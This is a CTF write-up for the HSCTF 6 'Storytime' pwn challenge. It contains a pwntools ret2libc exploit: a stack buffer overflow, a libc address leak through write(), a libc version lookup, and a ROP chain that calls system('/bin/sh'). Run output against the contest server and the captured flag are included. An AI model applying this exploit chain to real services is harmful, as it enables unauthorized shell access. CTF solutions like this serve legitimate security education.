| Event | Title | Category | Cost |
|---|---|---|---|
| HSCTF 6 | Storytime | Binary Exploitation | ~350 |
I want a story!!!
nc pwn.hsctf.com 3333
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Buffer overflow with NX and without libc version.
read() function is also weak for buf overflow.
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf; // [rsp+0h] [rbp-30h]
setvbuf(_bss_start, 0LL, 2, 0LL);
write(1, "HSCTF PWNNNNNNNNNNNNNNNNNNNN\n", 0x1DuLL);
write(1, "Tell me a story: \n", 0x12uLL);
read(0, &buf, 0x190uLL);
return 0;
}We need leak some address from got table, print it, compare offsets between downloaded libc and stored on server, calculate system() and /bin/sh/ addresses and send them using some ROP-gadgets and new call of read() function.
Leaking __libc_start_main:
elf = ELF("./storytime")
rop = ROP(elf)
...
WRITE = elf.plt['write']
LIBC_START_MAIN = elf.symbols['__libc_start_main']
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0]
POP_RSI = 0x400701 # pop rsi ; pop r15 ; ret
...
pl += p64(POP_RDI)
pl += p64(0X1)
pl += p64(POP_RSI)
pl += p64(LIBC_START_MAIN)
pl += p64(0x1)
pl += p64(WRITE)
...
leak = u64(data[0:6].strip().ljust(8, '\x00'))
log.info("Leaked libc address, __libc_start_main: %s" % hex(leak))Defining libc version with this site - https://libc.blukat.me/?q=__libc_start_main%3A0x7ff40347d740
Let`s download libc6_2.23-0ubuntu11_amd64.
libc = ELF("libc6_2.23-0ubuntu10_amd64.so")
...
libc.address = leak - libc.sym["__libc_start_main"]
log.info("Address of libc %s " % hex(libc.address))Finding system() and /bin/sh addresses:
BINSH = next(libc.search("/bin/sh"))
SYSTEM = libc.sym["system"]Calling another read function - climax()
ssize_t climax()
{
char buf; // [rsp+0h] [rbp-30h]
return read(0, &buf, 0xFA0uLL);
}pl += p64(CLIMAX) # read
io.sendline(pl)
...
pl2 = padding
pl2 += p64(POP_RDI)
pl2 += p64(BINSH)
pl2 += p64(SYSTEM)
io.sendline(pl2)Used ROP-gadgets:
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0]
POP_RSI = 0x400701 # pop rsi ; pop r15 ; retIt`s enough to wtite an exploit.
After we can run it and get the flag.
$ ./exp.py
[*] '/mnt/hgfs/shared/reverse/HSCTF6/storytime/storytime'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/mnt/hgfs/shared/reverse/HSCTF6/storytime/libc6_2.23-0ubuntu10_amd64.so'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded cached gadgets for './storytime'
[*] write@plt: 0x40049c
[*] __libc_start_main: 0x600ff0
[+] Opening connection to pwn.hsctf.com on port 3333: Done
HSCTF PWNNNNNNNNNNNNNNNNNNNN
Tell me a story:
[*] Leaked libc address, __libc_start_main: 0x7f27fda56740
[*] Address of libc 0x7f27fda36000
[*] bin/sh 0x7f27fdbc2d57
[*] system 0x7f27fda7b390
[*] Switching to interactive mode
# cat flag
hsctf{th4nk7_f0r_th3_g00d_st0ry_yay-314879357}hsctf{th4nk7_f0r_th3_g00d_st0ry_yay-314879357}